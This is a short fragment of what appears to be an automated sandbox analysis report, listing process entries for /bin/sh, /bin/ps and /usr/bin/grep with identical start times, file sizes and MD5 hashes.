MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb